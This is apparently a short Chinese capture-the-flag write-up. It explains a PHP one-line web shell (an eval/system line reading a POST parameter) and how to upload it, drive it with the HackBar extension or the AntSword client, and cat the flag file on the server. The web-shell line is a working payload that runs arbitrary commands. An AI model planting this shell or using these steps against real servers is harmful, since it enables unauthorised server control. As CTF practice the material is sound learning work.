文章讲述了如何在PHP中使用eval函数构造一句话木马,通过POST方式上传并利用MaxHacKBar执行命令,展示了如何在服务器上找到并显示flag。作者还证实了蚁剑工具同样适用于此场景。
<?php @eval(system($_POST['shell'])); ?>利用eval函数解析$shell的值使得服务器执行system命令
eval函数是无法直接执行命令的,只能把字符串当作php代码解析
这里我们构造的木马是POST的方式上传,那就用MaxHacKBar来执行
创建好的木马上传后记下这个路径:
点击"Load URL"并且把刚才我们上传的文件路径粘贴到后面
接下来把我们要执行的命令以POST的方式赋值给shell就可以命令执行了
最后也是在根目录下找到了flag
cat一下flag
经测试这里发现直接用一句话木马,用蚁剑连接也是可以成功的
也是可以在根目录找到flag
7344
3311
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
